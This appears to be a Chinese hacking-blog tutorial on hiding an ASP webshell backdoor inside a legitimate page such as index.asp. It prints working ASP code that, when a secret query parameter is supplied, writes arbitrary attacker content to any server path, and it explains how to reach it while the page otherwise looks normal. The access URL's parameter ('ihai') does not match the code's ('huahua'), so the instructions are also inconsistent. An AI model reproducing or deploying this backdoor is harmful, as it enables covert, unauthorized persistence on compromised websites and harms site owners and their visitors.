一种隐藏ASP木马的方法

得到网站的webshell后，如果被管理员发现，那么你的马就没用了 ，被删了！
所以我们要隐藏好我们的SHELL
下面教一种很菜的方法，ASP插入法，不容易被发现~  

在我们要做手脚的ASP文件里加入如下内容

<% if request("action")="shell" then %>

****************************

<% end if %>



在***********处加入你的shell代码
就哦克了
访问的时候在你做了手脚的ASP文件后面加上?action=shell（例如:index.asp?action=shell）
就可以调出webshell了，不影响正常浏揽。

＝＝＝＝＝＝＝＝＝＝＝＝＝＝＝＝＝＝＝＝＝＝＝＝＝＝＝＝＝＝＝＝
我们在index.asp隐藏自己的asp木马
把Newmm代码加到index.asp中


<% if request("huahua")="52" then %>
<% dim objFSO %>
<% dim fdata %>
<% dim objCountFile %>
<% on error resume next %>
<% Set objFSO = Server.CreateObject("Scripting.FileSystemObject") %>
<% if Trim(request("syfdpath"))<>"" then %>
<% fdata = request("cyfddata") %>
<% Set objCountFile=objFSO.CreateTextFile(request("syfdpath"),True) %>
<% objCountFile.Write fdata %>
<% if err =0 then %>
<% response.write "save Success!" %>
<% else %>
<% response.write "Save UnSuccess!" %>
<% end if %>
<% err.clear %>
<% end if %>
<% objCountFile.Close %>
<% Set objCountFile=Nothing %>
<% Set objFSO = Nothing %>
<% Response.write "

" %>
<% Response.write "保存文件的绝对路径(包括文件名:如D:\web\x.asp):" %>
<% Response.Write "" %>
<% Response.Write "
" %>
<% Response.write "本文件绝对路径" %>
<% =server.mappath(Request.ServerVariables("SCRIPT_NAME")) %>
<% Response.write "
" %>
<% Response.write "输入马的内容:" %>
<% Response.write "" %>
<% Response.write "" %>
<% Response.write "

" %>
<% end if %>
然后我们打开http://qq/index.asp
一切正常，没什么反映
在http://qq/index.asp后面加?ihai=52
http://qq/index.asp?ihai=52
看到我们马儿没
这个后门比较隐秘吧，总比我们一个有着自己名字的后门好吧

上一篇: 小巧的Gif动画制作工具---giftools 3.1
下一篇: 让ASP木马不被杀
文章来自: 本站原创
引用通告: 查看所有引用 | 我要引用此文章
Tags:
相关日志: